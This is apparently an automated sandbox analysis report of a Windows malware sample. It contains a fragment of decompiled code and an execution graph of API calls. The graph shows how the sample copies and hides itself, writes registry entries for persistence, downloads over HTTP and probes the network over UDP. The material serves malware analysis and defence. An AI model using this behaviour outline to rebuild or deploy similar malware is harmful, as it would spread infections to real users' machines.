                                                                                                                                                                                                                                                                  									_t62 = E0040C7E0(_v28);
                                                                                                                                                                                                                                                                  									_t90 = _t90 + 4;
                                                                                                                                                                                                                                                                  									_v36 = _t62;
                                                                                                                                                                                                                                                                  									if(_v36 != 0) {
                                                                                                                                                                                                                                                                  										E0040B100( &_v16, "%S%S", _v32);
                                                                                                                                                                                                                                                                  										_t90 = _t90 + 0x10;
                                                                                                                                                                                                                                                                  										__imp__#6(_v36, _v36);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__imp__#6(_v32);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E00408990(_v12);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v16;
                                                                                                                                                                                                                                                                  			}


















                                                                                                                                                                                                                                                                  0x0040c956
                                                                                                                                                                                                                                                                  0x0040c965
                                                                                                                                                                                                                                                                  0x0040c96a
                                                                                                                                                                                                                                                                  0x0040c96d
                                                                                                                                                                                                                                                                  0x0040c974
                                                                                                                                                                                                                                                                  0x0040c97e
                                                                                                                                                                                                                                                                  0x0040c983
                                                                                                                                                                                                                                                                  0x0040c986
                                                                                                                                                                                                                                                                  0x0040c98d
                                                                                                                                                                                                                                                                  0x0040c993
                                                                                                                                                                                                                                                                  0x0040c99d
                                                                                                                                                                                                                                                                  0x0040c9a6
                                                                                                                                                                                                                                                                  0x0040c9b1
                                                                                                                                                                                                                                                                  0x0040c9c1
                                                                                                                                                                                                                                                                  0x0040c9cb
                                                                                                                                                                                                                                                                  0x0040c9d4
                                                                                                                                                                                                                                                                  0x0040c9dc
                                                                                                                                                                                                                                                                  0x0040c9e8
                                                                                                                                                                                                                                                                  0x0040c9ed
                                                                                                                                                                                                                                                                  0x0040c9f0
                                                                                                                                                                                                                                                                  0x0040c9f7
                                                                                                                                                                                                                                                                  0x0040c9fd
                                                                                                                                                                                                                                                                  0x0040ca02
                                                                                                                                                                                                                                                                  0x0040ca05
                                                                                                                                                                                                                                                                  0x0040ca0c
                                                                                                                                                                                                                                                                  0x0040ca1f
                                                                                                                                                                                                                                                                  0x0040ca24
                                                                                                                                                                                                                                                                  0x0040ca2b
                                                                                                                                                                                                                                                                  0x0040ca2b
                                                                                                                                                                                                                                                                  0x0040ca35
                                                                                                                                                                                                                                                                  0x0040ca35
                                                                                                                                                                                                                                                                  0x0040ca47
                                                                                                                                                                                                                                                                  0x0040ca47
                                                                                                                                                                                                                                                                  0x0040ca55
                                                                                                                                                                                                                                                                  0x0040ca55
                                                                                                                                                                                                                                                                  0x0040ca63
                                                                                                                                                                                                                                                                  0x0040ca63
                                                                                                                                                                                                                                                                  0x0040ca69
                                                                                                                                                                                                                                                                  0x0040ca6e
                                                                                                                                                                                                                                                                  0x0040ca77

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: memset.NTDLL ref: 0040BFA8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetCrackUrlA.WININET(0040CD99,00000000,10000000,0000003C), ref: 0040BFF8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C008
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C041
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C077
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C09F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C0E8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BF80: InternetCloseHandle.WININET(00000000), ref: 0040C177
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BD20: SysAllocString.OLEAUT32(00000000), ref: 0040BD4E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BD20: CoCreateInstance.OLE32(0040F318,00000000,00004401,0040F308,00000000), ref: 0040BD76
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BD20: SysFreeString.OLEAUT32(00000000), ref: 0040BE11
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CA2B
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CA35
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                                                                                                  • String ID: %S%S
                                                                                                                                                                                                                                                                  • API String ID: 1017111014-3267608656
                                                                                                                                                                                                                                                                  • Opcode ID: cf7c80b9f99cf27fc7490acd5b8d9b01802d00b15e672ea0d64acd8fc672cfaa
                                                                                                                                                                                                                                                                  • Instruction ID: fa3ea7129126085e9455d64281f51dd4710db2dfe7809279c8c0483b4bb99b26
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf7c80b9f99cf27fc7490acd5b8d9b01802d00b15e672ea0d64acd8fc672cfaa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D741F8B5A00109DFCB04DBA4C885BAFB7B9AF48304F148669E505B7391D738AA45CFA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:0.2%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                  Total number of Nodes:1440
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:2
                                                                                                                                                                                                                                                                  execution_graph 4236 405b40 Sleep 4237 405b68 4236->4237 4238 405b76 PathFileExistsW 4237->4238 4239 405bbc CreateMutexA GetLastError 4237->4239 4238->4237 4242 405b85 DeleteFileW DeleteFileA MoveFileA 4238->4242 4240 405be6 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 4239->4240 4241 405bde ExitProcess 4239->4241 4243 405c71 4240->4243 4242->4237 4244 405f5e Sleep RegOpenKeyExA 4243->4244 4291 40ce10 GetLocaleInfoA 4243->4291 4245 406075 RegOpenKeyExA 4244->4245 4246 405f8f 8 API calls 4244->4246 4248 406181 Sleep 4245->4248 4249 40609b 8 API calls 4245->4249 4246->4245 4298 40aee0 4248->4298 4249->4248 4252 405d10 ExpandEnvironmentStringsW wsprintfW CopyFileW 4255 405d64 SetFileAttributesW RegOpenKeyExW 4252->4255 4256 405e3d Sleep wsprintfW CopyFileW 4252->4256 4253 405d08 ExitProcess 4259 405d99 RegSetValueExW RegCloseKey 4255->4259 4260 405e1e 4255->4260 4256->4244 4258 405e85 SetFileAttributesW RegOpenKeyExW 4256->4258 4257 40619c 9 API calls 4301 404320 InitializeCriticalSection CreateFileW 4257->4301 4263 405eba RegSetValueExW RegCloseKey 4258->4263 4264 405f3f 4258->4264 4259->4260 4293 40d0b0 memset CreateProcessW 4260->4293 4263->4264 4268 40d0b0 5 API calls 4264->4268 4273 405f4b 4268->4273 4269 4062e9 4270 405e35 ExitProcess 4273->4244 4275 405f56 ExitProcess 4273->4275 4277 406251 CreateEventA 4333 40a610 4277->4333 4286 40b8c0 17 API calls 4287 4062b1 4286->4287 4288 40b8c0 17 API calls 4287->4288 4289 4062cd 4288->4289 4290 40b8c0 17 API calls 4289->4290 4290->4269 4292 405d00 4291->4292 4292->4252 4292->4253 4294 40d110 Sleep 4293->4294 4295 40d11f ShellExecuteW 4293->4295 4296 405e2a 4294->4296 4295->4296 4297 40d145 Sleep 4295->4297 4296->4256 4296->4270 4297->4296 4378 40aeb0 4298->4378 4302 404445 4301->4302 4303 404358 CreateFileMappingW 4301->4303 4315 40cd40 CoInitializeEx 4302->4315 4304 404379 MapViewOfFile 4303->4304 4305 40443b CloseHandle 4303->4305 4306 404431 CloseHandle 4304->4306 4307 404398 GetFileSize 4304->4307 4305->4302 4306->4305 4311 4043ad 4307->4311 4308 404427 UnmapViewOfFile 4308->4306 4309 4043bc 4309->4308 4311->4308 4311->4309 4312 4043ec 4311->4312 4507 40af30 4311->4507 4514 404210 4311->4514 4313 408990 __aligned_recalloc_base 3 API calls 4312->4313 4313->4309 4751 40c2a0 socket 4315->4751 4317 40624c 4328 4058d0 CoInitializeEx SysAllocString 4317->4328 4320 40cdaa 4776 409260 htons 4320->4776 4321 40cd60 4321->4317 4321->4320 4327 40cde8 4321->4327 4761 40c950 4321->4761 4326 40ccc0 24 API calls 4326->4327 4795 408ab0 4327->4795 4329 4058f2 4328->4329 4330 405908 CoUninitialize 4328->4330 4940 405640 4329->4940 4330->4277 4949 40a5d0 4333->4949 4336 40a5d0 3 API calls 4337 40a62e 4336->4337 4338 40a5d0 3 API calls 4337->4338 4339 40a63e 4338->4339 4340 40a5d0 3 API calls 4339->4340 4341 406269 4340->4341 4342 40b810 4341->4342 4343 408820 7 API calls 4342->4343 4344 40b81b 4343->4344 4345 406273 4344->4345 4346 40b827 InitializeCriticalSection 4344->4346 4347 409a60 InitializeCriticalSection 4345->4347 4346->4345 4362 409a7a 4347->4362 4348 409aa9 CreateFileW 4350 409ad0 CreateFileMappingW 4348->4350 4351 409b92 4348->4351 4352 409af1 MapViewOfFile 4350->4352 4353 409b88 CloseHandle 4350->4353 4993 409470 EnterCriticalSection 4351->4993 4355 409b0c GetFileSize 4352->4355 4356 409b7e CloseHandle 4352->4356 4353->4351 4364 409b2b 4355->4364 4356->4353 4358 409b97 4359 40b8c0 17 API calls 4358->4359 4360 40627d 4359->4360 4366 40b8c0 4360->4366 4361 409b74 UnmapViewOfFile 4361->4356 4362->4348 4956 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 4362->4956 4957 409750 4362->4957 4364->4361 4365 409750 28 API calls 4364->4365 4992 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 4364->4992 4365->4364 4367 40b8d7 EnterCriticalSection 4366->4367 4368 406296 4366->4368 5016 40b840 4367->5016 4368->4286 4371 40b99b LeaveCriticalSection 4371->4368 4372 408880 9 API calls 4373 40b919 4372->4373 4373->4371 4374 40b92b CreateThread 4373->4374 4374->4371 4375 40b94e 4374->4375 4376 40b972 GetCurrentProcess GetCurrentProcess DuplicateHandle 4375->4376 4377 40b994 4375->4377 4376->4377 4377->4371 4381 40ae50 4378->4381 4382 40ae83 4381->4382 4383 40ae6e 4381->4383 4385 406191 4382->4385 4413 40ac80 4382->4413 4387 40ab00 4383->4387 4385->4257 4385->4269 4388 40abb2 4387->4388 4389 40ab29 4387->4389 4391 408820 7 API calls 4388->4391 4412 40abaa 4388->4412 4389->4412 4447 408820 4389->4447 4393 40abd8 4391->4393 4395 401000 7 API calls 4393->4395 4393->4412 4397 40ac05 4395->4397 4399 4011e0 10 API calls 4397->4399 4401 40ac1f 4399->4401 4400 40ab7f 4402 401000 7 API calls 4400->4402 4403 401000 7 API calls 4401->4403 4404 40ab90 4402->4404 4405 40ac30 4403->4405 4406 4011e0 10 API calls 4404->4406 4407 4011e0 10 API calls 4405->4407 4406->4412 4408 40ac4a 4407->4408 4409 401000 7 API calls 4408->4409 4410 40ac5b 4409->4410 4411 4011e0 10 API calls 4410->4411 4411->4412 4412->4385 4414 40aca9 4413->4414 4415 40ad5a 4413->4415 4416 408820 7 API calls 4414->4416 4446 40ad52 4414->4446 4418 408820 7 API calls 4415->4418 4415->4446 4417 40acbf 4416->4417 4420 401000 7 API calls 4417->4420 4417->4446 4419 40ad7e 4418->4419 4421 401000 7 API calls 4419->4421 4419->4446 4422 40ace3 4420->4422 4423 40ada2 4421->4423 4424 408820 7 API calls 4422->4424 4426 408820 7 API calls 4423->4426 4425 40acf2 4424->4425 4427 4011e0 10 API calls 4425->4427 4428 40adb1 4426->4428 4429 40ad1b 4427->4429 4430 4011e0 10 API calls 4428->4430 4431 408990 __aligned_recalloc_base 3 API calls 4429->4431 4432 40adda 4430->4432 4433 40ad27 4431->4433 4434 408990 __aligned_recalloc_base 3 API calls 4432->4434 4435 401000 7 API calls 4433->4435 4436 40ade6 4434->4436 4437 40ad38 4435->4437 4438 401000 7 API calls 4436->4438 4439 4011e0 10 API calls 4437->4439 4440 40adf7 4438->4440 4439->4446 4441 4011e0 10 API calls 4440->4441 4442 40ae11 4441->4442 4443 401000 7 API calls 4442->4443 4444 40ae22 4443->4444 4445 4011e0 10 API calls 4444->4445 4445->4446 4446->4385 4458 408780 4447->4458 4450 401000 4479 408840 4450->4479 4455 4011e0 4486 4010c0 4455->4486 4457 4011ff _invalid_parameter 4457->4400 4467 408570 GetCurrentProcessId 4458->4467 4460 40878b 4461 408797 __aligned_recalloc_base 4460->4461 4468 4086e0 4460->4468 4463 40880c 4461->4463 4464 4087b2 HeapAlloc 4461->4464 4463->4412 4463->4450 4464->4463 4465 4087d9 __aligned_recalloc_base 4464->4465 4465->4463 4466 4087f4 memset 4465->4466 4466->4463 4467->4460 4476 408570 GetCurrentProcessId 4468->4476 4470 4086e9 4471 408706 HeapCreate 4470->4471 4477 408650 GetProcessHeaps 4470->4477 4473 408720 HeapSetInformation GetCurrentProcessId 4471->4473 4474 408747 4471->4474 4473->4474 4474->4461 4476->4470 4478 408681 4477->4478 4478->4471 4478->4474 4480 408780 __aligned_recalloc_base 7 API calls 4479->4480 4481 40100b 4480->4481 4482 401400 4481->4482 4483 40140a 4482->4483 4484 408840 __aligned_recalloc_base 7 API calls 4483->4484 4485 401018 4484->4485 4485->4455 4487 40110e 4486->4487 4495 4010d1 4486->4495 4488 408840 __aligned_recalloc_base 7 API calls 4487->4488 4487->4495 4491 401132 _invalid_parameter 4488->4491 4489 401162 memcpy 4490 401186 _invalid_parameter 4489->4490 4493 408990 __aligned_recalloc_base 3 API calls 4490->4493 4491->4489 4496 408990 4491->4496 4493->4495 4495->4457 4503 408570 GetCurrentProcessId 4496->4503 4498 40899b 4499 40115f 4498->4499 4504 408590 4498->4504 4499->4489 4502 4089b7 HeapFree 4502->4499 4503->4498 4505 4085c0 HeapValidate 4504->4505 4506 4085e0 4504->4506 4505->4506 4506->4499 4506->4502 4523 408a00 4507->4523 4510 40af71 4510->4311 4513 408990 __aligned_recalloc_base 3 API calls 4513->4510 4731 408880 4514->4731 4517 404301 4517->4311 4518 408a00 8 API calls 4519 40427b 4518->4519 4741 40a8a0 4519->4741 4524 408a2d 4523->4524 4525 408840 __aligned_recalloc_base 7 API calls 4524->4525 4526 408a42 4524->4526 4527 408a44 memcpy 4524->4527 4525->4524 4526->4510 4528 40a440 4526->4528 4527->4524 4530 40a44c 4528->4530 4532 40a4a8 4530->4532 4534 408990 __aligned_recalloc_base 3 API calls 4530->4534 4535 40a46b 4530->4535 4536 40a990 4530->4536 4550 406300 4530->4550 4533 408990 __aligned_recalloc_base 3 API calls 4532->4533 4533->4535 4534->4530 4535->4510 4535->4513 4538 40a99f __aligned_recalloc_base 4536->4538 4537 40a9a9 4537->4530 4538->4537 4539 408840 __aligned_recalloc_base 7 API calls 4538->4539 4540 40aa38 4539->4540 4540->4537 4541 401000 7 API calls 4540->4541 4542 40aa4d 4541->4542 4543 401000 7 API calls 4542->4543 4544 40aa55 4543->4544 4546 40aaad __aligned_recalloc_base 4544->4546 4553 40a930 4544->4553 4558 401050 4546->4558 4549 401050 3 API calls 4549->4537 4666 4084f0 4550->4666 4554 4011e0 10 API calls 4553->4554 4555 40a944 4554->4555 4564 4013e0 4555->4564 4557 40a95c 4557->4544 4559 4010ae 4558->4559 4562 401064 _invalid_parameter 4558->4562 4559->4549 4560 40108c 4561 408990 __aligned_recalloc_base 3 API calls 4560->4561 4561->4559 4562->4560 4563 408990 __aligned_recalloc_base 3 API calls 4562->4563 4563->4560 4567 4012d0 4564->4567 4566 4013fa 4566->4557 4568 4012e4 4567->4568 4569 4010c0 __aligned_recalloc_base 10 API calls 4568->4569 4570 40132d 4569->4570 4571 4010c0 __aligned_recalloc_base 10 API calls 4570->4571 4572 40133d 4571->4572 4573 4010c0 __aligned_recalloc_base 10 API calls 4572->4573 4574 40134d 4573->4574 4575 4010c0 __aligned_recalloc_base 10 API calls 4574->4575 4576 40135d 4575->4576 4577 401366 4576->4577 4578 40138f 4576->4578 4582 402c20 4577->4582 4599 4029d0 4578->4599 4581 401387 _invalid_parameter 4581->4566 4583 401400 _invalid_parameter 7 API calls 4582->4583 4584 402c37 4583->4584 4585 401400 _invalid_parameter 7 API calls 4584->4585 4586 402c46 4585->4586 4587 401400 _invalid_parameter 7 API calls 4586->4587 4588 402c55 4587->4588 4589 401400 _invalid_parameter 7 API calls 4588->4589 4598 402c64 _invalid_parameter 4589->4598 4591 402e0f _invalid_parameter 4592 401430 _invalid_parameter 3 API calls 4591->4592 4593 402e35 _invalid_parameter 4591->4593 4592->4591 4594 401430 _invalid_parameter 3 API calls 4593->4594 4595 402e5b _invalid_parameter 4593->4595 4594->4593 4596 401430 _invalid_parameter 3 API calls 4595->4596 4597 402e81 4595->4597 4596->4595 4597->4581 4598->4591 4602 401430 4598->4602 4606 402e90 4599->4606 4601 4029ec 4601->4581 4603 40143b 4602->4603 4605 401446 4602->4605 4604 408990 __aligned_recalloc_base 3 API calls 4603->4604 4604->4605 4605->4598 4607 402ea6 _invalid_parameter 4606->4607 4608 402edd 4607->4608 4610 402eb8 _invalid_parameter 4607->4610 4611 402f03 4607->4611 4636 402880 4608->4636 4610->4601 4612 402f3d 4611->4612 4613 402f5e 4611->4613 4646 402a00 4612->4646 4615 401400 _invalid_parameter 7 API calls 4613->4615 4616 402f6f 4615->4616 4617 401400 _invalid_parameter 7 API calls 4616->4617 4618 402f7e 4617->4618 4619 401400 _invalid_parameter 7 API calls 4618->4619 4620 402f8d 4619->4620 4621 401400 _invalid_parameter 7 API calls 4620->4621 4622 402f9c 4621->4622 4659 402950 4622->4659 4624 401400 _invalid_parameter 7 API calls 4625 402fca _invalid_parameter 4624->4625 4625->4624 4628 403084 _invalid_parameter 4625->4628 4626 401430 _invalid_parameter 3 API calls 4626->4628 4627 4033a3 _invalid_parameter 4629 401430 _invalid_parameter 3 API calls 4627->4629 4630 4033c9 _invalid_parameter 4627->4630 4628->4626 4628->4627 4629->4627 4631 401430 _invalid_parameter 3 API calls 4630->4631 4632 4033ef _invalid_parameter 4630->4632 4631->4630 4633 401430 _invalid_parameter 3 API calls 4632->4633 4634 403415 _invalid_parameter 4632->4634 4633->4632 4634->4610 4635 401430 _invalid_parameter 3 API calls 4634->4635 4635->4634 4637 40288e 4636->4637 4638 401400 _invalid_parameter 7 API calls 4637->4638 4639 4028ab 4638->4639 4640 401400 _invalid_parameter 7 API calls 4639->4640 4641 4028ba _invalid_parameter 4640->4641 4642 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4641->4642 4643 40291a _invalid_parameter 4641->4643 4642->4641 4644 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4643->4644 4645 402940 4643->4645 4644->4643 4645->4610 4647 401400 _invalid_parameter 7 API calls 4646->4647 4648 402a17 4647->4648 4649 401400 _invalid_parameter 7 API calls 4648->4649 4650 402a26 4649->4650 4651 401400 _invalid_parameter 7 API calls 4650->4651 4658 402a35 _invalid_parameter 4651->4658 4652 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4652->4658 4653 402bc1 _invalid_parameter 4654 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4653->4654 4655 402be7 _invalid_parameter 4653->4655 4654->4653 4656 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4655->4656 4657 402c0d 4655->4657 4656->4655 4657->4610 4658->4652 4658->4653 4660 401400 _invalid_parameter 7 API calls 4659->4660 4661 40295f _invalid_parameter 4660->4661 4662 402880 _invalid_parameter 9 API calls 4661->4662 4663 402998 _invalid_parameter 4662->4663 4664 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4663->4664 4665 4029c3 4663->4665 4664->4663 4665->4625 4667 408502 4666->4667 4670 408450 4667->4670 4671 408840 __aligned_recalloc_base 7 API calls 4670->4671 4673 408460 4671->4673 4676 40631f 4673->4676 4677 40849c 4673->4677 4679 407990 4673->4679 4686 407f70 4673->4686 4691 408340 4673->4691 4675 408990 __aligned_recalloc_base 3 API calls 4675->4676 4676->4530 4677->4675 4680 4079a3 4679->4680 4685 407999 4679->4685 4681 4079e6 memset 4680->4681 4680->4685 4682 407a07 4681->4682 4681->4685 4683 407a0d memcpy 4682->4683 4682->4685 4699 407760 4683->4699 4685->4673 4687 407f87 4686->4687 4690 407f7d 4686->4690 4688 40807f memcpy 4687->4688 4687->4690 4704 407cb0 4687->4704 4688->4687 4690->4673 4692 40834c 4691->4692 4694 408356 4691->4694 4692->4673 4693 407cb0 57 API calls 4695 4083d7 4693->4695 4694->4692 4694->4693 4695->4692 4696 407760 6 API calls 4695->4696 4697 4083f6 4696->4697 4697->4692 4698 40840b memcpy 4697->4698 4698->4692 4700 4077ae 4699->4700 4702 40776e 4699->4702 4700->4685 4702->4700 4703 4076a0 6 API calls 4702->4703 4703->4702 4705 407ccb 4704->4705 4707 407cc1 4704->4707 4705->4707 4710 407af0 4705->4710 4707->4687 4709 407cb0 57 API calls 4709->4707 4711 407afd 4710->4711 4712 407b07 4710->4712 4711->4707 4711->4709 4712->4711 4713 407b90 4712->4713 4715 407b95 4712->4715 4716 407b78 4712->4716 4721 407450 4713->4721 4719 407760 6 API calls 4715->4719 4718 407760 6 API calls 4716->4718 4718->4713 4719->4713 4720 407c3c memset 4720->4711 4722 407469 4721->4722 4727 40745f 4721->4727 4723 407330 6 API calls 4722->4723 4722->4727 4724 407562 4723->4724 4725 408840 __aligned_recalloc_base 7 API calls 4724->4725 4726 4075b1 4725->4726 4726->4727 4728 4071b0 44 API calls 4726->4728 4727->4711 4727->4720 4729 4075de 4728->4729 4730 408990 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4729->4730 4730->4727 4750 408570 GetCurrentProcessId 4731->4750 4733 40888b 4734 4086e0 __aligned_recalloc_base 5 API calls 4733->4734 4740 408897 __aligned_recalloc_base 4733->4740 4734->4740 4735 408940 HeapAlloc 4735->4740 4736 40890a HeapReAlloc 4736->4740 4737 408590 __aligned_recalloc_base HeapValidate 4737->4740 4738 408990 __aligned_recalloc_base 3 API calls 4738->4740 4739 404237 4739->4517 4739->4518 4740->4735 4740->4736 4740->4737 4740->4738 4740->4739 4744 40a8ab 4741->4744 4742 408840 __aligned_recalloc_base 7 API calls 4742->4744 4743 4042c6 4743->4517 4745 4059c0 4743->4745 4744->4742 4744->4743 4746 408840 __aligned_recalloc_base 7 API calls 4745->4746 4747 4059d0 4746->4747 4748 405a17 4747->4748 4749 4059dc memcpy CreateThread CloseHandle 4747->4749 4748->4517 4749->4748 4750->4733 4752 40c2cd htons inet_addr setsockopt 4751->4752 4757 40c3fe 4751->4757 4753 409260 8 API calls 4752->4753 4754 40c346 bind lstrlenA sendto ioctlsocket 4753->4754 4760 40c39b 4754->4760 4757->4321 4758 40c3c2 4808 409320 shutdown closesocket 4758->4808 4759 408880 9 API calls 4759->4760 4760->4758 4760->4759 4799 40c1b0 4760->4799 4815 40bf80 memset InternetCrackUrlA InternetOpenA 4761->4815 4764 40ca6e 4764->4321 4766 40ca3b 4767 408990 __aligned_recalloc_base 3 API calls 4766->4767 4767->4764 4773 40ca31 SysFreeString 4773->4766 4922 409220 inet_addr 4776->4922 4779 4092bc connect 4780 4092d0 getsockname 4779->4780 4781 409304 4779->4781 4780->4781 4925 409320 shutdown closesocket 4781->4925 4783 40930d 4784 40ccc0 4783->4784 4926 409200 inet_ntoa 4784->4926 4786 40ccd6 4787 40b100 11 API calls 4786->4787 4788 40ccf5 4787->4788 4789 40cd38 4788->4789 4927 40ca80 memset InternetCrackUrlA InternetOpenA 4788->4927 4789->4326 4792 40cd2c 4794 408990 __aligned_recalloc_base 3 API calls 4792->4794 4793 408990 __aligned_recalloc_base 3 API calls 4793->4792 4794->4789 4797 408ab4 4795->4797 4796 408aba 4796->4317 4797->4796 4798 408990 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 4797->4798 4798->4797 4805 40c1cc 4799->4805 4800 40c294 4800->4760 4801 40c1e8 recvfrom 4802 40c216 StrCmpNIA 4801->4802 4803 40c209 Sleep 4801->4803 4804 40c235 StrStrIA 4802->4804 4802->4805 4803->4805 4804->4805 4806 40c256 StrChrA 4804->4806 4805->4800 4805->4801 4809 40afb0 4806->4809 4808->4757 4810 40afbb 4809->4810 4811 40afc1 lstrlenA 4810->4811 4812 40afd4 4810->4812 4813 408840 __aligned_recalloc_base 7 API calls 4810->4813 4814 40aff0 memcpy 4810->4814 4811->4810 4811->4812 4812->4805 4813->4810 4814->4810 4814->4812 4816 40c021 InternetConnectA 4815->4816 4817 40c197 4815->4817 4818 40c18a InternetCloseHandle 4816->4818 4819 40c05a HttpOpenRequestA 4816->4819 4817->4764 4828 40bd20 4817->4828 4818->4817 4820 40c090 HttpSendRequestA 4819->4820 4821 40c17d InternetCloseHandle 4819->4821 4822 40c170 InternetCloseHandle 4820->4822 4824 40c0ad 4820->4824 4821->4818 4822->4821 4823 40c0ce InternetReadFile 4823->4824 4825 40c0fb 4823->4825 4824->4823 4824->4825 4826 408880 9 API calls 4824->4826 4825->4822 4827 40c116 memcpy 4826->4827 4827->4824 4857 403ce0 4828->4857 4831 40be20 4831->4766 4838 40c900 4831->4838 4832 40bd4a SysAllocString 4833 40bd61 CoCreateInstance 4832->4833 4834 40be17 4832->4834 4835 40be0d SysFreeString 4833->4835 4837 40bd86 4833->4837 4836 408990 __aligned_recalloc_base 3 API calls 4834->4836 4835->4834 4836->4831 4837->4835 4874 40be30 4838->4874 4841 40c7e0 4879 40c600 4841->4879 4846 40c760 6 API calls 4847 40c837 4846->4847 4853 40c889 4847->4853 4896 40c580 4847->4896 4850 40c86f 4850->4853 4901 40bf20 4850->4901 4851 40c580 6 API calls 4851->4850 4853->4773 4854 40b100 4853->4854 4917 40b070 4854->4917 4862 403ced 4857->4862 4858 403cf3 lstrlenA 4858->4862 4863 403d06 4858->4863 4860 408840 __aligned_recalloc_base 7 API calls 4860->4862 4862->4858 4862->4860 4862->4863 4864 408990 __aligned_recalloc_base 3 API calls 4862->4864 4865 403bc0 4862->4865 4869 403c90 4862->4869 4863->4831 4863->4832 4864->4862 4866 403bd7 MultiByteToWideChar 4865->4866 4867 403bca lstrlenA 4865->4867 4868 403bfc 4866->4868 4867->4866 4868->4862 4870 403c9b 4869->4870 4871 403ca1 lstrlenA 4870->4871 4872 403bc0 2 API calls 4870->4872 4873 403cd7 4870->4873 4871->4870 4872->4870 4873->4862 4877 40be56 4874->4877 4875 40befb 4875->4766 4875->4841 4876 40bed3 lstrcmpiW 4876->4877 4878 40beeb SysFreeString 4876->4878 4877->4875 4877->4876 4877->4878 4878->4877 4881 40c626 4879->4881 4880 40c73d 4880->4853 4891 40c760 4880->4891 4881->4880 4882 40c6b3 lstrcmpiW 4881->4882 4883 40c733 SysFreeString 4882->4883 4884 40c6c6 4882->4884 4883->4880 4885 40bf20 2 API calls 4884->4885 4887 40c6d4 4885->4887 4886 40c725 4886->4883 4887->4883 4887->4886 4888 40c703 lstrcmpiW 4887->4888 4889 40c715 4888->4889 4890 40c71b SysFreeString 4888->4890 4889->4890 4890->4886 4892 40bf20 2 API calls 4891->4892 4893 40c77b 4892->4893 4894 40c600 6 API calls 4893->4894 4895 40c7b7 4893->4895 4894->4895 4895->4846 4895->4853 4897 40bf20 2 API calls 4896->4897 4899 40c59b 4897->4899 4898 40c5d7 4898->4850 4898->4851 4899->4898 4905 40c420 4899->4905 4902 40bf46 4901->4902 4903 40bf5d 4902->4903 4904 40be30 2 API calls 4902->4904 4903->4853 4904->4903 4907 40c446 4905->4907 4906 40c55d 4906->4898 4907->4906 4908 40c4d3 lstrcmpiW 4907->4908 4909 40c553 SysFreeString 4908->4909 4910 40c4e6 4908->4910 4909->4906 4911 40bf20 2 API calls 4910->4911 4913 40c4f4 4911->4913 4912 40c545 4912->4909 4913->4909 4913->4912 4914 40c523 lstrcmpiW 4913->4914 4915 